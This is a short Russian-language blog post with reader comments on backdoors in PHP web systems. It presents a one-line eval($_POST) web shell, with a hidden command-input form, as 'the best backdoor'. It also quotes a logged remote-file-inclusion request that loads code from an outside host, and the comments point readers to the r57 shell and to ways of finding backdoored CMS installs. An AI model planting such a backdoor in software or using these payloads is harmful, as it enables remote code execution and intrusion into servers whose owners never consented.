Backdoor — тайный ход, лазейка. Разумное человечество использовало всегда запасной случай что-бы не попасть впросак. К примеру те же замки, которые могли иметь по несколько тайных ходов на случай осады. В том же Гарри Поттере это придаёт много интриги сюжету, а вместе с ним и больше свободы, силы и возможностей персонажу.
В инфосистемах же лазейки нужны не только мстящим бывшим сотрудникам, влезшим через загрузку аватара хакерам, но и в обычном процессе поставки платной зашифрованной Zend'ом или IonCube'ом CMSки. Помоему самый лучший backdoor на php выглядит примерно так:
eval($_POST['sys_call']);
//echo '<form method="POST"><textarea name="sys_call"></textarea><input type="submit"></form>';
Конечно тут могут быть вариации с проверкой IP или домена "палача", и более сложные защиты от третьих лиц. С точки зрения клиента, таким же обходным путём является функция восстановление пароля через email.
Взломы
Не в планах было писать о взломах, но поскольку модуль статистики у меня исправный, а запросы к серверу интересные, то немогу не поделиться
Как вам такой GET запрос..
?_SERVER[DOCUMENT_ROOT]=http://moisidis.gr/siteframe/ips.txt?
Комментарии
а есть примеры забэгдоренных CMS-ок?
Я бы выложил найденный давно мною r57 shell, но к сегодняшнему дну gmail (где я его хранил) научился читать внутренности .rar архивов и не разрешает ничего кроме удаления с аттачментом. Но вы можете найти его в нете.. securitylab.ru и тп.
насчет примеров забекдоренных ..их море вырисовывается в гугле по запросу копирайтов r57 (тех что в футере)